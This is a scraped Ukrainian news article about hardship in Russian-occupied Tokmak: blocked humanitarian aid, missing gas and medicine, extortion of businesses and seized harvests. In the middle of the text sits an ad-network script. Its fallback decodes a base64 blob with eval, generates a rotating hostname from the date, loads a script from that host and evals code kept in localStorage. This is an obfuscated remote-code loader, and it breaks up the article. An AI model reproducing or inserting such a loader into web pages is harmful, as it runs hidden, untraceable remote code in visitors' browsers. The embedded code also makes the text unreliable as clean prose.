Ситуація погіршується щодня: як виживає місто на Запоріжжі, яке РФ окупувала в перші дні війни (ВІДЕО)

В окупованому Токмаку через нашестя ворога щодня погіршується ситуація: у місті відсутній газ та медикаменти, а окупанти не пропускають гуманітарні вантажі.

Про те, як виживає громада Запорізької області, яку російські загарбники захопили в перші дні війни — розповіли у випуску телеканалу ALEX UA, інформує Акцент.

Як йдеться у випуску, Токмацька громада, яка складається з міста та 25 навколишніх сіл, з початку повномасштабного вторгнення перебуває під окупацією рф. Через воєнні дії найбільше постраждав Новопрокопівський старостат — там пошкоджені будинки та школа. Ситуація в самому Токмаку залишається вкрай важкою.

«Місто працювало, жило, процвітало, а зараз настає десята-дванадцята година дня і місто вимирає. Люди зранку швиденько пробіглись — хто на ринок, хто в магазин, а потім додому, в крайньому випадку — на дачу, де займаються своїм домогосподарством. Точно так і в селі: з села дуже важко доїхати до Токмаку, транспорт не ходить, а свої машини контролюються окупантами», — розповідає голова Токмацької міської військової адміністрації Олександр Чуб.

Так, на блок-посту у Василівці ворог не пропускає гуманітарні вантажі та продукти, зокрема і ліки, тож медичні заклади перебувають у дуже скрутному становищі. Окупанти перешкоджають роботі бізнесу, вимагають з підприємців гроші. За словами Олександра Чуба, поля фермерів, які виїхали на підконтрольні Україні території, не дають прибирати, або убирають окупанти за допомогою колаборантів і привласнюють врожаї собі. Як додає очільник, у магазинах громади всі товари та продукти на сьогоднішній час російського виробництва.

Також, більшість вчителів виїхало на підконтрольні Україні території та викладають предмети за українською програмою, однак вже два місяці не отримують зарплатні. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Це все залежить від того, що в Токмацькій громаді загинув міський голова і не має права першого підпису. Зараз ВР розглядає постанову, яка надасть військовій адміністрації повноваження місього голови та виконкому», — пояснює Олександр Чуб.

Як зазначається у випуску, проблему з опаленням не можна вирішити через відсутність газу.

Як раніше повідомляв Акцент, вночі 25 вересня ворог завдав потужних ракетних ударів одразу в кількох районах міста Запоріжжя: руйнувань зазнали об’єкти інфраструктури, заклади освіти та лікарня, у багатоквартирних будинках та будинках приватного сектору пошкоджено вікна, у частини яких було зруйновано ще й покрівлю.
(adsbygoogle = window.adsbygoogle || []).push({});

Що розповідають очевидці ракетного обстрілу Запоріжжя (ВІДЕО) Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/situatsiya-pogirshuyetsya-shhodnya-yak-vizhivaye-misto-na-zaporizhzhi-yake-rf-okupuvala-v-pershi-dni-vijni-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top